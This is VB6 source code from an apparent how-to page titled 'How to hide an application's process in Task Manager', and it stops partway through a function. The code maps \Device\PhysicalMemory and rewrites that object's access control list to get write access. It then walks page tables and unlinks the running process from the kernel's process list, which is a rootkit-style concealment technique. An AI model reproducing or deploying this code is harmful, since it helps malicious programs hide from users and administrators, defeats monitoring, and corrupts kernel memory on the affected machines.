How to hide an application's process in Task Manager in VB
' This module hides the process in Task Manager

Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4

Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
End Type

Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
End Type

Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2

Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDescriptor As Long
    SecurityQualityOfService As Long
End Type

Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
End Type

Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
End Enum

Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
End Enum

Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
End Enum

Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
End Enum

Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
End Type

Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
End Type

Private Type AceArray
    List() As EXPLICIT_ACCESS
End Type

Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
End Enum

Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte

Public Sub HideCurrentProcess()
    ' Hide the current application's process in the process list
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    ' Offsets are set only for platform 2 (NT), version 5.0 and 5.1
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If
    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)
        process = GetData(thread + &H44)
        ' Read the forward and backward links of this process's list entry
        fw = GetData(process + lOffsetFlink)
        bw = GetData(process + lOffsetBlink)
        ' Point the neighbouring entries at each other, unlinking this entry
        SetData fw + 4, bw
        SetData bw, fw
        CloseHandle g_hMPM
    End If
End Sub

Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    ' Add an ACE granting the current user SECTION_MAP_WRITE on the section
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS
    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    SetEntriesInAcl 1, ea, pDacl, pNewDacl
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
End Sub

Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES
    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDescriptor = 0
    Attributes.SecurityQualityOfService = 0
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        ' Reopen with READ_CONTROL Or WRITE_DAC, change the DACL, then retry
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        SetPhyscialMemorySectionCanBeWrited g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If
    Dim lDirectoty As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lDirectoty = &H30000
                    Case 1
                        lDirectoty = &H39000
                End Select
            End If
        End If
    End If
    If Status = 0 Then
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
        If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
End Function

Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    ' Translate a linear address to a physical address through the page tables
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long
    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4
    If (PGDE And 1) <> 0 Then
        lTemp = PGDE And &H80
        If lTemp <> 0 Then
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
            lTemp = (VAddr And &H3FF000) / (2 ^ 12)
            PTE = PGDE + lTemp * 4
            CopyMemory PTE, ByVal PTE, 4
            If (PTE And 1) <> 0 Then
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
                UnmapViewOfFile PGDE
            End If
        End If
    End If
    LinearToPhys = PAddr
End Function

Private Function GetData(addr As Long) As Long
    Dim phys
